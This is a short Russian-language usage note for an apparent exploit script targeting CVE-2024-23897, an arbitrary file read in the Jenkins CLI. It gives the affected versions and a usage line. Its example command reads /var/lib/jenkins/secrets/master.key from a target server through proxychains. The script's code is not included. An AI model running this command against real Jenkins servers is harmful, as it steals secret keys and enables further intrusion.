
Произвольное чтение Jenkins CLI (CVE-2024-23897 применимо к версиям ниже 2.442 и LTS 2.426.3)
Читает первые 3 строки любого файла, доступного для чтения текущему пользователю в системе. Скрипт внутренне использует proxychains.
Использование:
python CVE-2024-23897.py <jenkins-cli.jar path> <target URI> <file path>
Пример:
python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key